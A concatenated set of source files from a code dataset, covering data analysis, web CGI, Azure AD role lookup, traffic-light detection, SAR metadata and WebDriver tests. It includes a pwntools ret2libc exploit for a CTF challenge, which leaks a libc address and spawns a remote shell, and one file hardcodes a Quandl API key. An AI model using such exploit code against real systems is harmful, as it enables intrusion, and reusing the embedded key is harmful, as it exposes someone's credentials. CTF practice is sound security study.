id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
3276391 | <reponame>yull1860outlook/Data-Analysis<filename>sentdex_data_analysis/pandas_joiningData.py
import pickle
import pandas as pd
import quandl
import matplotlib.pyplot as plt
from matplotlib import style
style.use("seaborn")
quandl.ApiConfig.api_key = "rFsSehe51RLzREtYhLfo"
def mortgage_30yr():
    """Fetch the Freddie Mac 30-year mortgage rate series from Quandl.

    Returns a monthly-resampled series of the percent change of the rate
    relative to its first value after 1974-12-01.
    """
    rates = quandl.get("FMAC/MORTG")
    rates = rates[rates.index > "1974-12-01"]
    baseline = rates["Value"][0]
    pct_change = (rates["Value"] - baseline) / baseline * 100
    return pct_change.resample("M").mean()
# Two stacked axes sharing the x-axis (HPI data on top, mortgage rate below).
ax1 = plt.subplot(2, 1, 1)
ax2 = plt.subplot(2, 1, 2, sharex=ax1)

# initial_state_data()
# Use context managers so the pickle file handles are not leaked.
with open("fifty_states_pct.pickle", "rb") as pickle_in:
    HPI_data = pickle.load(pickle_in)
# HPI_Benchmark()
with open("us_pct.pickle", "rb") as pickle_in:
    benchmark = pickle.load(pickle_in)

m30 = mortgage_30yr()
HPI_Bench = benchmark
state_HPI_M30 = HPI_data.join(m30)
# BUG FIX: rename() with a bare mapping relabels the *index*, not the
# columns; the columns= keyword is required for the "Value" column coming
# from the mortgage series to actually become "M30".
state_HPI_M30.rename(columns={"Value": "M30"}, inplace=True)
# With the rename fixed, the correlation column is "M30", not "Value".
print(state_HPI_M30.corr().describe()["M30"])
| StarcoderdataPython |
179128 | <gh_stars>0
#!_PYTHONLOC
#
# (C) COPYRIGHT 2004-2021 Ahasuerus and <NAME>
# ALL RIGHTS RESERVED
#
# The copyright notice above does not evidence any actual or
# intended publication of such source code.
#
# Version: $Revision$
# Date: $Date$
import cgi
import sys
import MySQLdb
import string
from isfdb import *
from isfdblib import *
from SQLparsing import *
from common import *
from library import *
debug = 0
def DoError(text):
    # Render an error message in the standard ISFDB error box, finish the
    # moderator page, and abort the CGI script.
    #
    # text: message to display; inserted into the HTML without escaping, so
    # callers must pass trusted text only.
    print '<div id="ErrorBox">'
    print '<h3>%s</h3>' % text
    # PrintPostMod comes from one of the star imports above -- TODO confirm
    PrintPostMod()
    print '</div>'
    sys.exit(0)
def DoSubmission(db, submission):
    # Apply a LinkAward submission: relink an award record to a title record.
    #
    # db:         open MySQLdb connection
    # submission: submission ID whose XML payload is loaded from the database
    #
    # Returns (title_id, award_id); exits via DoError on invalid input.
    # Emits the executed SQL as HTML list items as it goes.
    title_id =0
    award_id = 0
    xml = SQLloadXML(submission)
    # minidom is presumably provided by one of the star imports -- verify
    doc = minidom.parseString(XMLunescape2(xml))
    if doc.getElementsByTagName('LinkAward'):
        merge = doc.getElementsByTagName('LinkAward')
        print "<ul>"
        if TagPresent(merge, 'Title'):
            title_id = int(GetElementValue(merge, 'Title'))
        else:
            DoError('No Title record specified')
        if TagPresent(merge, 'Award'):
            award_id = int(GetElementValue(merge, 'Award'))
            if award_id < 1:
                # NOTE(review): bare `raise` with no active exception will
                # itself fail with a TypeError instead of reporting cleanly;
                # DoError would be the consistent way to bail out here.
                raise
        else:
            DoError('No valid award record specified')
        # award_id/title_id are ints, so %d interpolation cannot inject SQL.
        update = "delete from title_awards where award_id='%d';" % award_id
        print "<li> ", update
        if debug == 0:
            db.query(update)
        if int(title_id):
            update = "insert into title_awards(title_id, award_id) values(%d, %d);" % (title_id, award_id)
            print "<li> ", update
            if debug == 0:
                db.query(update)
        submitter = GetElementValue(merge, 'Submitter')
        if debug == 0:
            markIntegrated(db, submission, award_id)
    return (title_id, award_id)
if __name__ == '__main__':
    # CGI entry point: moderator approval of a LinkAward submission.
    submission = SESSION.Parameter(0, 'int')
    PrintPreMod('Link Award - SQL Statements')
    PrintNavBar()
    if NotApprovable(submission):
        sys.exit(0)
    print '<h1>SQL Updates:</h1>'
    print '<hr>'
    # `db` is presumably a module-level connection created by a star import
    # above -- TODO confirm
    (title_id, award_id) = DoSubmission(db, submission)
    if title_id > 0:
        print ISFDBLinkNoName('title.cgi', title_id, 'View Title record', True)
    if award_id > 0:
        print ISFDBLinkNoName('award_details.cgi', award_id, 'View Award record', True)
    print '<p>'
    PrintPostMod(0)
| StarcoderdataPython |
1673338 | import logging
import requests
from msal import ConfidentialClientApplication
from core import config
from models.domain.workspace import Workspace, WorkspaceRole
from resources import strings
from services.access_service import AccessService, AuthConfigValidationError
from services.authentication import User
class AADAccessService(AccessService):
    """Azure Active Directory implementation of AccessService.

    Resolves workspace app registrations and user app-role assignments via
    the Microsoft Graph API, authenticating with the API's own client
    credentials (client-credential flow).
    """

    @staticmethod
    def _get_msgraph_token() -> str:
        # Acquire an app-only access token for Microsoft Graph, preferring a
        # cached token over a round-trip to AAD.
        scopes = ["https://graph.microsoft.com/.default"]
        app = ConfidentialClientApplication(client_id=config.API_CLIENT_ID, client_credential=config.API_CLIENT_SECRET, authority=f"{config.AAD_INSTANCE}/{config.AAD_TENANT_ID}")
        result = app.acquire_token_silent(scopes=scopes, account=None)
        if not result:
            logging.info('No suitable token exists in cache, getting a new one from AAD')
            result = app.acquire_token_for_client(scopes=scopes)
        if "access_token" not in result:
            # Surface AAD's diagnostic fields before failing.
            logging.debug(result.get('error'))
            logging.debug(result.get('error_description'))
            logging.debug(result.get('correlation_id'))
            raise Exception(result.get('error'))
        return result["access_token"]

    @staticmethod
    def _get_auth_header(msgraph_token: str) -> dict:
        # Build the Authorization header for a Graph request.
        return {'Authorization': 'Bearer ' + msgraph_token}

    @staticmethod
    def _get_service_principal_endpoint(app_id) -> str:
        # Graph query returning the service principal(s) registered for the
        # given application (client) id.
        return f"https://graph.microsoft.com/v1.0/serviceprincipals?$filter=appid eq '{app_id}'"

    def _get_app_sp_graph_data(self, app_id: str) -> dict:
        # Fetch the service-principal document for app_id from Graph.
        # NOTE(review): no timeout or status-code check on the request -- a
        # Graph outage surfaces as a hang or a JSON decode error.
        msgraph_token = self._get_msgraph_token()
        sp_endpoint = self._get_service_principal_endpoint(app_id)
        graph_data = requests.get(sp_endpoint, headers=self._get_auth_header(msgraph_token)).json()
        return graph_data

    def _get_app_auth_info(self, app_id: str) -> dict:
        # Extract the service-principal id and its app-role name->id mapping
        # for the workspace app. Raises AuthConfigValidationError if Graph
        # returned no matching service principal.
        graph_data = self._get_app_sp_graph_data(app_id)
        if 'value' not in graph_data or len(graph_data['value']) == 0:
            logging.debug(graph_data)
            raise AuthConfigValidationError(f"{strings.ACCESS_UNABLE_TO_GET_INFO_FOR_APP} {app_id}")
        app_info = graph_data['value'][0]
        sp_id = app_info['id']
        roles = app_info['appRoles']
        return {
            'sp_id': sp_id,
            'roles': {role['value']: role['id'] for role in roles}
        }

    def _get_role_assignment_graph_data(self, user_id: str) -> dict:
        # Fetch all app-role assignments held by the given AAD user.
        # NOTE(review): same missing timeout/status check as above.
        msgraph_token = self._get_msgraph_token()
        user_endpoint = f"https://graph.microsoft.com/v1.0/users/{user_id}/appRoleAssignments"
        graph_data = requests.get(user_endpoint, headers=self._get_auth_header(msgraph_token)).json()
        return graph_data

    def extract_workspace_auth_information(self, data: dict) -> dict:
        # Validate a workspace creation payload: it must carry an app_id
        # whose app registration defines both workspace roles.
        if "app_id" not in data:
            raise AuthConfigValidationError(strings.ACCESS_PLEASE_SUPPLY_APP_ID)
        auth_info = self._get_app_auth_info(data["app_id"])
        for role in ['WorkspaceOwner', 'WorkspaceResearcher']:
            if role not in auth_info['roles']:
                raise AuthConfigValidationError(f"{strings.ACCESS_APP_IS_MISSING_ROLE} {role}")
        return auth_info

    def get_user_role_assignments(self, user_id: str) -> dict:
        # Map resourceId (service principal) -> appRoleId for every app-role
        # assignment the user holds.
        graph_data = self._get_role_assignment_graph_data(user_id)
        if 'value' not in graph_data:
            logging.debug(graph_data)
            raise AuthConfigValidationError(f"{strings.ACCESS_UNABLE_TO_GET_ROLE_ASSIGNMENTS_FOR_USER} {user_id}")
        return {role_assignment['resourceId']: role_assignment['appRoleId'] for role_assignment in graph_data['value']}

    @staticmethod
    def get_workspace_role(user: User, workspace: Workspace) -> WorkspaceRole:
        # Determine the user's role in a workspace by matching the
        # workspace's service principal against the user's role assignments.
        # Owner takes precedence over Researcher; no match means NoRole.
        if 'sp_id' not in workspace.authInformation or 'roles' not in workspace.authInformation:
            raise AuthConfigValidationError(strings.AUTH_CONFIGURATION_NOT_AVAILABLE_FOR_WORKSPACE)
        workspace_sp_id = workspace.authInformation['sp_id']
        workspace_roles = workspace.authInformation['roles']
        if 'WorkspaceOwner' not in workspace_roles or 'WorkspaceResearcher' not in workspace_roles:
            raise AuthConfigValidationError(strings.AUTH_CONFIGURATION_NOT_AVAILABLE_FOR_WORKSPACE)
        if workspace_sp_id in user.roleAssignments:
            if workspace_roles['WorkspaceOwner'] == user.roleAssignments[workspace_sp_id]:
                return WorkspaceRole.Owner
            if workspace_roles['WorkspaceResearcher'] == user.roleAssignments[workspace_sp_id]:
                return WorkspaceRole.Researcher
        return WorkspaceRole.NoRole
| StarcoderdataPython |
3256116 | <reponame>nhtri2003gmail/ctf-write-ups
#!/usr/bin/env python3
from pwn import *
# Stage 0: target setup -------------------------------------------------------
binary = context.binary = ELF('./chall_13')
context.log_level = 'INFO'
if not args.REMOTE:
    context.log_file = 'local.log'
    libc = binary.libc
    p = process(binary.path)
else:
    context.log_file = 'remote.log'
    # index into the libc.rip search results picking the matching candidate
    libc_index = 1
    p = remote('chal.2020.sunshinectf.org', 30013)
p.sendlineafter('Keep on writing\n','foobar')

# Stage 1: leak puts' runtime address via ret2plt -----------------------------
# 0x3e bytes of padding reach the saved return address (32-bit stack frame);
# return into puts@plt with puts' GOT entry as argument, then back into vuln
# so a second payload can be sent.
payload = 0x3e * b'A'
payload += p32(binary.plt.puts)
payload += p32(binary.sym.vuln)
payload += p32(binary.got.puts)
p.sendline(payload)
_ = p.recv(4)
puts = u32(_)
log.info('puts: ' + hex(puts))
p.recv(20)

# Stage 2: identify the remote libc from the leak (remote runs only) ----------
if not 'libc' in locals():
    try:
        import requests
        # look up libc by the low 12 bits of puts (the page offset is not
        # affected by ASLR)
        r = requests.post('https://libc.rip/api/find', json = {'symbols':{'puts':hex(puts)[-3:]}})
        libc_url = r.json()[libc_index]['download_url']
        libc_file = libc_url.split('/')[-1:][0]
        if not os.path.exists(libc_file):
            log.info('getting: ' + libc_url)
            r = requests.get(libc_url, allow_redirects=True)
            open(libc_file,'wb').write(r.content)
    except:
        log.critical('get libc yourself!')
        sys.exit(0)
    libc = ELF(libc_file)

# Stage 3: compute the libc base and ret2libc to system("/bin/sh") ------------
libc.address = puts - libc.sym.puts
log.info('libc.address: ' + hex(libc.address))
payload = 0x3e * b'A'
payload += p32(libc.sym.system)
payload += 4 * b'B'  # fake return address for system()
payload += p32(libc.search(b'/bin/sh').__next__())
p.sendline(payload)
p.interactive()
| StarcoderdataPython |
3319973 | from styx_msgs.msg import TrafficLight
import rospy
import tensorflow as tf
import numpy as np
import os
import cv2
class TLClassifier(object):
    """Traffic-light detector/classifier.

    Runs a frozen TensorFlow object-detection model to locate traffic lights
    inside a region of interest, then classifies each light's color by
    comparing the mean brightness of the top/middle/bottom thirds of the
    detected box.
    """

    def __init__(self, model_name):
        # model_name: directory containing frozen_inference_graph.pb
        # Variables
        PATH_TO_CKPT = os.path.join(model_name, 'frozen_inference_graph.pb')
        # Index 0-2 match the section-argmax classes (red/yellow/green);
        # index 4 is presumably TrafficLight.UNKNOWN -- TODO confirm the
        # message constant values.
        self.tl_colors = ['Red', 'Yellow', 'Green', '-', 'Undefined']
        self.tl_colorCodes = [(0, 0, 255), (0, 255, 255), (0, 255, 0), (0, 0, 0), (200, 200, 200)]
        # Load frozen TF model to memory
        self.detection_graph = tf.Graph()
        with self.detection_graph.as_default():
            od_graph_def = tf.GraphDef()
            with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
                serialized_graph = fid.read()
                od_graph_def.ParseFromString(serialized_graph)
                tf.import_graph_def(od_graph_def, name='')
        # Definite input and output Tensors for self.detection_graph
        self.image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
        # Each box represents a part of the image where a particular object was detected.
        self.detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')
        # Each score represent how level of confidence for each of the objects.
        # Score is shown on the result image, together with the class label.
        self.detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')
        self.detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')
        self.num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')
        # Allow GPU memory to grow on demand instead of grabbing it all.
        config = tf.ConfigProto()
        config.gpu_options.allow_growth = True
        self.sess = tf.Session(graph=self.detection_graph, config=config)
        # Variables for frames skipping when running on a CPU: every other
        # frame returns the previous result to keep latency bounded.
        self.on_gpu = tf.test.is_gpu_available(cuda_only=True)
        self.skip_frame = False
        self.last_state = TrafficLight.UNKNOWN
        self.last_image_np = np.zeros(1)

    def get_classification(self, image, roi):
        """Determines the color of the traffic light in the image
        Args:
            image (cv::Mat): image containing the traffic light
            roi: (ymin, xmin, ymax, xmax) fractions of the image to search in
        Returns:
            int: ID of traffic light color (specified in styx_msgs/TrafficLight)
            image (cv::Mat): image containing debug detection output
        """
        tl_state = TrafficLight.UNKNOWN
        # Input image preprocessing: crop the search region (roi holds
        # fractional coordinates).
        image_np = np.array(image).astype(np.uint8)
        ymin = int(roi[0] * image_np.shape[0])
        xmin = int(roi[1] * image_np.shape[1])
        ymax = int(roi[2] * image_np.shape[0])
        xmax = int(roi[3] * image_np.shape[1])
        image_cropped = image_np[ymin:ymax, xmin:xmax]
        # Frames skipping when running on a CPU
        if not self.on_gpu and self.skip_frame:
            self.skip_frame = not self.skip_frame
            return self.last_state, self.last_image_np
        # Expand dimensions since the model expects images
        # to have shape: [1, None, None, 3]
        image_np_expanded = np.expand_dims(image_cropped, axis=0)
        # Actual detection.
        (boxes, scores, classes, num) = self.sess.run(
            [self.detection_boxes, self.detection_scores,
             self.detection_classes, self.num_detections],
            feed_dict={self.image_tensor: image_np_expanded})
        # Filter for robust tl_classification when there are multiple of them.
        # Class 10 is presumably "traffic light" (COCO label map) -- verify.
        tl_states = []
        for bbox, score, clas in zip(boxes[0], scores[0], classes[0]):
            if (score > 0.3) and (clas == 10) and \
                    (0.07/(roi[2]-roi[0]) < (bbox[2] - bbox[0]) < 0.5/(roi[2]-roi[0])):
                # bbox is fractional within the cropped image
                ytl = int(bbox[0] * image_cropped.shape[0])
                xtl = int(bbox[1] * image_cropped.shape[1])
                ybr = int(bbox[2] * image_cropped.shape[0])
                xbr = int(bbox[3] * image_cropped.shape[1])
                ### Classify the color of the traffic light
                # Crop the tl bbox
                tl_img = image_cropped[ytl:ybr, xtl:xbr]
                # Crop margins so only the lamps remain
                offset = int(tl_img.shape[1]/4)
                cr_img = tl_img[offset:-offset, offset:-offset]
                # Aspect ratio check: a vertical 3-lamp housing
                asp_rat = cr_img.shape[0] / cr_img.shape[1]
                if 1.5 < asp_rat < 5:
                    # Convert to HSV and extract Value part from the image
                    if cv2.__version__ < '3.0.0':
                        cr_v_img = cv2.cvtColor(cr_img, cv2.cv.CV_BGR2HSV)[:,:,2]
                    else:
                        cr_v_img = cv2.cvtColor(cr_img, cv2.COLOR_BGR2HSV)[:,:,2]
                    # Finding mean intensities of each section; the brightest
                    # third (top/middle/bottom) decides red/yellow/green.
                    section_h = int(cr_img.shape[0]/3)
                    sections = np.hstack((np.mean(cr_v_img[:section_h]),
                                          np.mean(cr_v_img[section_h:2*section_h]),
                                          np.mean(cr_v_img[2*section_h:])))
                    tl_st = np.argmax(sections)
                    tl_states.append(tl_st)
                    # Draw debug information on the frame (best effort).
                    try:
                        cv2.rectangle(image_np, (xmin+xtl, ymin+ytl),
                                      (xmin+xbr, ymin+ybr),
                                      self.tl_colorCodes[tl_st], 3)
                    except:
                        pass
                    txt = '%s: %.2f'%(self.tl_colors[tl_st][0], score)
                    bot_pos = ymin+ytl-10 if ymin+ytl-10 > 30 else ymin+ybr+25
                    left_pos = xmin+xtl if xmin+xtl > 0 else 0
                    try:
                        cv2.putText(image_np, txt, (left_pos, bot_pos),
                                    cv2.FONT_HERSHEY_SIMPLEX, 0.8,
                                    self.tl_colorCodes[tl_st], 2)
                    except:
                        pass
                else:
                    tl_st = TrafficLight.UNKNOWN
                # debug
                rospy.logdebug("%s: %.3f, bbox: %s"%(self.tl_colors[tl_st], score, bbox))
        # Only commit a state when every detected light agrees.
        if len(set(tl_states)) == 1:
            tl_state = tl_states[0]
            try:
                cv2.rectangle(image_np, (xmin, ymin), (xmax, ymax),
                              self.tl_colorCodes[tl_state], 15)
            except:
                pass
        # Update variables for frames skipping when running on a CPU
        if not self.on_gpu:
            self.last_state = tl_state
            self.skip_frame = not self.skip_frame
            self.last_image_np = image_np
        return tl_state, image_np
| StarcoderdataPython |
3364617 | <gh_stars>0
from m5.SimObject import SimObject
from m5.params import *
from m5.proxy import *
class BaseEnergySM(SimObject):
    """gem5 SimObject declaration for the base energy state machine; the
    C++ implementation lives in engy/state_machine.hh."""
    type = 'BaseEnergySM'
    cxx_header = "engy/state_machine.hh"
class SubrectangleQueries(object):
    """Mutable view over a 2-D integer grid supporting bulk rectangular writes.

    Note: the constructor keeps a reference to (not a copy of) the grid
    passed in, so external mutations of the list are visible here and
    vice versa.
    """

    def __init__(self, rectangle):
        """
        :type rectangle: List[List[int]]
        """
        self.rectangle = rectangle

    def updateSubrectangle(self, row1, col1, row2, col2, newValue):
        """Set every cell of the inclusive sub-rectangle
        (row1, col1)..(row2, col2) to newValue.

        :type row1: int
        :type col1: int
        :type row2: int
        :type col2: int
        :type newValue: int
        :rtype: None
        """
        width = col2 - col1 + 1
        for row in self.rectangle[row1:row2 + 1]:
            # Slice assignment overwrites the same cells the original
            # per-cell loop touched.
            row[col1:col2 + 1] = [newValue] * width

    def getValue(self, row, col):
        """Return the value currently stored at (row, col).

        :type row: int
        :type col: int
        :rtype: int
        """
        return self.rectangle[row][col]


# Your SubrectangleQueries object will be instantiated and called as such:
# obj = SubrectangleQueries(rectangle)
# obj.updateSubrectangle(row1,col1,row2,col2,newValue)
# param_2 = obj.getValue(row,col)
4841030 | """
The SRP definition for CPHD 0.3.
"""
from typing import Union
import numpy
from sarpy.compliance import integer_types
from sarpy.io.phase_history.cphd1_elements.base import DEFAULT_STRICT
# noinspection PyProtectedMember
from sarpy.io.complex.sicd_elements.base import Serializable, _SerializableDescriptor, \
_IntegerEnumDescriptor
__classification__ = "UNCLASSIFIED"
__author__ = "<NAME>"
class FxParametersType(Serializable):
    """
    The FX vector parameters.

    Each attribute is the size in bytes (always 8) of the corresponding
    per-vector field in the CPHD 0.3 binary layout.
    """

    _fields = ('Fx0', 'Fx_SS', 'Fx1', 'Fx2')
    _required = _fields
    # descriptors
    Fx0 = _IntegerEnumDescriptor(
        'Fx0', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the Fx0 field')  # type: int
    Fx_SS = _IntegerEnumDescriptor(
        'Fx_SS', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the Fx_SS field')  # type: int
    Fx1 = _IntegerEnumDescriptor(
        'Fx1', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the Fx1 field')  # type: int
    Fx2 = _IntegerEnumDescriptor(
        'Fx2', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the Fx2 field')  # type: int

    def __init__(self, Fx0=8, Fx_SS=8, Fx1=8, Fx2=8, **kwargs):
        # All sizes are fixed at 8 bytes; the constructor accepts them for
        # serialization symmetry.
        if '_xml_ns' in kwargs:
            self._xml_ns = kwargs['_xml_ns']
        if '_xml_ns_key' in kwargs:
            self._xml_ns_key = kwargs['_xml_ns_key']
        self.Fx0 = Fx0
        self.Fx1 = Fx1
        self.Fx2 = Fx2
        self.Fx_SS = Fx_SS
        super(FxParametersType, self).__init__(**kwargs)

    @staticmethod
    def get_size():
        """
        The size in bytes of this component of the vector (4 fields x 8 bytes).

        Returns
        -------
        int
        """
        return 32

    def get_position_offset_and_size(self, field):
        """
        Get the offset and size of the given field from the beginning of the vector.

        Parameters
        ----------
        field : str

        Returns
        -------
        None|(int, int)
            (offset, size) in bytes, or None if `field` is unknown.
        """
        if field not in self._fields:
            return None
        out = 0
        for fld in self._fields:
            val = getattr(self, fld)
            if fld == field:
                return out, val
            else:
                out += val
        return None

    def get_dtype_components(self):
        """
        Gets the dtype components (big-endian float64 per field).

        Returns
        -------
        List[Tuple]
        """
        return [(entry, '>f8') for entry in self._fields]
class TOAParametersType(Serializable):
    """
    The TOA vector parameters.

    Each attribute is the size in bytes (always 8) of the corresponding
    per-vector field in the CPHD 0.3 binary layout.
    """

    _fields = ('DeltaTOA0', 'TOA_SS')
    _required = _fields
    # descriptors
    DeltaTOA0 = _IntegerEnumDescriptor(
        'DeltaTOA0', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the DeltaTOA0 field')  # type: int
    TOA_SS = _IntegerEnumDescriptor(
        'TOA_SS', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the TOA_SS field')  # type: int

    def __init__(self, DeltaTOA0=8, TOA_SS=8, **kwargs):
        # Both sizes are fixed at 8 bytes; accepted for serialization symmetry.
        if '_xml_ns' in kwargs:
            self._xml_ns = kwargs['_xml_ns']
        if '_xml_ns_key' in kwargs:
            self._xml_ns_key = kwargs['_xml_ns_key']
        self.DeltaTOA0 = DeltaTOA0
        self.TOA_SS = TOA_SS
        super(TOAParametersType, self).__init__(**kwargs)

    @staticmethod
    def get_size():
        """
        The size in bytes of this component of the vector (2 fields x 8 bytes).

        Returns
        -------
        int
        """
        return 16

    def get_position_offset_and_size(self, field):
        """
        Get the offset and size of the given field from the beginning of the vector.

        Parameters
        ----------
        field : str

        Returns
        -------
        None|(int, int)
            (offset, size) in bytes, or None if `field` is unknown.
        """
        if field not in self._fields:
            return None
        out = 0
        for fld in self._fields:
            val = getattr(self, fld)
            if fld == field:
                return out, val
            else:
                out += val
        return None

    def get_dtype_components(self):
        """
        Gets the dtype components (big-endian float64 per field).

        Returns
        -------
        List[Tuple]
        """
        return [(entry, '>f8') for entry in self._fields]
class VectorParametersType(Serializable):
    """
    The vector parameters sizes object.

    Each integer attribute gives the size in bytes of the corresponding
    per-vector parameter; the FxParameters/TOAParameters groups are mutually
    exclusive and depend on the collection's DomainType.
    """

    _fields = (
        'TxTime', 'TxPos', 'RcvTime', 'RcvPos', 'SRPTime', 'SRPPos', 'AmpSF', 'TropoSRP',
        'FxParameters', 'TOAParameters')
    _required = (
        'TxTime', 'TxPos', 'RcvTime', 'RcvPos', 'SRPPos')
    _choice = ({'required': False, 'collection': ('FxParameters', 'TOAParameters')}, )
    # descriptors
    TxTime = _IntegerEnumDescriptor(
        'TxTime', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the TxTime field')  # type: int
    TxPos = _IntegerEnumDescriptor(
        'TxPos', (24, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the TxPos field')  # type: int
    RcvTime = _IntegerEnumDescriptor(
        'RcvTime', (8, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the RcvTime field')  # type: int
    RcvPos = _IntegerEnumDescriptor(
        'RcvPos', (24, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the RcvPos field')  # type: int
    SRPTime = _IntegerEnumDescriptor(
        'SRPTime', (8, ), _required, strict=DEFAULT_STRICT, default_value=None,
        docstring='The size of the SRPTime field')  # type: int
    SRPPos = _IntegerEnumDescriptor(
        'SRPPos', (24, ), _required, strict=DEFAULT_STRICT, default_value=8,
        docstring='The size of the SRPPos field')  # type: int
    AmpSF = _IntegerEnumDescriptor(
        'AmpSF', (8, ), _required, strict=DEFAULT_STRICT, default_value=None,
        docstring='The size of the AmpSF field')  # type: int
    TropoSRP = _IntegerEnumDescriptor(
        'TropoSRP', (8, ), _required, strict=DEFAULT_STRICT, default_value=None,
        docstring='The size of the TropoSRP field')  # type: int
    FxParameters = _SerializableDescriptor(
        'FxParameters', FxParametersType, _required, strict=DEFAULT_STRICT,
        docstring='The frequency parameters, only present when DomainType is '
                  'FX.')  # type: Union[None, FxParametersType]
    # BUG FIX: this descriptor was declared with FxParametersType, which
    # would deserialize/validate TOAParameters against the wrong schema; the
    # type comment and __init__ contract both require TOAParametersType.
    TOAParameters = _SerializableDescriptor(
        'TOAParameters', TOAParametersType, _required, strict=DEFAULT_STRICT,
        docstring='The TOA parameters, only present when DomainType is '
                  'TOA.')  # type: Union[None, TOAParametersType]

    def __init__(self, TxTime=8, TxPos=24, RcvTime=8, RcvPos=24, SRPTime=None, SRPPos=24,
                 AmpSF=None, TropoSRP=None, FxParameters=None, TOAParameters=None, **kwargs):
        """

        Parameters
        ----------
        TxTime : int
        TxPos : int
        RcvTime : int
        RcvPos : int
        SRPTime : None|int
        SRPPos : int
        AmpSF : None|int
        TropoSRP : None|int
        FxParameters : None|FxParametersType
        TOAParameters : None|TOAParametersType
        kwargs
        """
        if '_xml_ns' in kwargs:
            self._xml_ns = kwargs['_xml_ns']
        if '_xml_ns_key' in kwargs:
            self._xml_ns_key = kwargs['_xml_ns_key']
        self.TxTime = TxTime
        self.TxPos = TxPos
        self.RcvTime = RcvTime
        self.RcvPos = RcvPos
        self.SRPTime = SRPTime
        self.SRPPos = SRPPos
        self.AmpSF = AmpSF
        self.TropoSRP = TropoSRP
        self.FxParameters = FxParameters
        self.TOAParameters = TOAParameters
        super(VectorParametersType, self).__init__(**kwargs)

    def get_size(self):
        """
        The total size in bytes of one vector: the sum of all present scalar
        field sizes plus the present Fx/TOA parameter group, if any.

        Returns
        -------
        int
        """
        out = 0
        for fld in self._fields:
            val = getattr(self, fld)
            if val is None:
                pass
            elif isinstance(val, integer_types):
                out += val
            elif isinstance(val, (FxParametersType, TOAParametersType)):
                out += val.get_size()
            else:
                raise TypeError('Got unhandled type {}'.format(type(val)))
        return out

    def get_position_offset_and_size(self, field):
        """
        Get the offset and size of the given field from the beginning of the
        vector, descending into the Fx/TOA parameter groups as needed.

        Parameters
        ----------
        field : str

        Returns
        -------
        None|(int, int)
            (offset, size) in bytes, or None if `field` is absent/unknown.
        """
        out = 0
        for fld in self._fields:
            val = getattr(self, fld)
            if fld == field:
                if val is not None:
                    return out, val
                else:
                    return None
            if val is None:
                pass
            elif isinstance(val, integer_types):
                out += val
            elif isinstance(val, (FxParametersType, TOAParametersType)):
                res = val.get_position_offset_and_size(field)
                if res is not None:
                    return out+res[0], res[1]
                else:
                    out += val.get_size()
            else:
                raise TypeError('Got unhandled type {}'.format(type(val)))
        return None

    def get_vector_dtype(self):
        """
        Gets the dtype for the corresponding structured array for the full
        PVP array. Scalar 8-byte fields map to big-endian float64, 24-byte
        fields to a float64 triple.

        Returns
        -------
        numpy.dtype
            This will be a compound dtype for a structured array.
        """
        the_type_info = []
        for fld in self._fields:
            val = getattr(self, fld)
            if val is None:
                continue
            if fld in ['FxParameters', 'TOAParameters']:
                the_type_info.extend(val.get_dtype_components())
            else:
                assert isinstance(val, integer_types), 'CPHD 0.3 PVP field {} should be an integer, got {}'.format(fld, val)
                if val == 8:
                    the_type_info.append((fld, '>f8'))
                elif val == 24:
                    the_type_info.append((fld, '>f8', (3, )))
                else:
                    raise ValueError('Got unhandled value {} for CPHD 0.3 PVP field {}'.format(val, fld))
        return numpy.dtype(the_type_info)
| StarcoderdataPython |
1741834 | <filename>leo/plugins/obsolete/gtkGui.py
#@+leo-ver=4-thin
#@+node:ekr.20080112150934:@thin gtkGui.py
'''The plugin part of the gtk gui code.'''
import leoGlobals as g
import leoGtkGui
try:
import gtk
except ImportError:
gtk = None
g.es_print('can not import gtk')
#@+others
#@+node:ekr.20080112150934.1:init
def init():
    # Leo plugin entry point: install the gtk gui if possible.
    # Returns True when the gtk gui is (now) the active gui.
    if g.app.unitTesting:  # Not Ok for unit testing!
        return False
    if not gtk:
        # gtk failed to import at module load time.
        return False
    if g.app.gui:
        # Another gui is already installed; succeed only if it is ours.
        return g.app.gui.guiName() == 'gtk'
    else:
        g.app.gui = leoGtkGui.gtkGui()
        # g.app.root = g.app.gui.createRootWindow()
        g.app.gui.finishCreate()
        g.plugin_signon(__name__)
        return True
#@-others
#@-node:ekr.20080112150934:@thin gtkGui.py
#@-leo
| StarcoderdataPython |
108461 | <reponame>hiikezoe/web-platform-tests
# META: timeout=long
from tests.support.inline import inline
from tests.support.asserts import assert_error, assert_success, assert_dialog_handled
from tests.support.fixtures import create_dialog
alert_doc = inline("<script>window.alert()</script>")
def read_global(session, name):
    """Evaluate the global *name* in the session's current browsing context."""
    script = "return %s;" % name
    return session.execute_script(script)
def fullscreen(session):
    """Send the Fullscreen Window command for *session* and return the response."""
    url = "session/%s/window/fullscreen" % session.session_id
    return session.transport.send("POST", url)
# 10.7.5 Fullscreen Window
# 1. If the current top-level browsing context is no longer open, return error
# with error code no such window.
def test_no_browsing_context(session, create_window):
    # step 1: closing the only window leaves no top-level browsing context,
    # so the command must fail with "no such window".
    session.window_handle = create_window()
    session.close()

    response = fullscreen(session)

    assert_error(response, "no such window")
# [...]
# 2. Handle any user prompts and return its value if it is an error.
# [...]
# In order to handle any user prompts a remote end must take the following
# steps:
# 2. Run the substeps of the first matching user prompt handler:
#
# [...]
# - accept state
# 1. Accept the current user prompt.
# [...]
#
# 3. Return success.
def test_handle_prompt_accept(new_session):
    """With unhandledPromptBehavior=accept, a user prompt open when the
    Fullscreen Window command arrives is accepted and the command succeeds."""
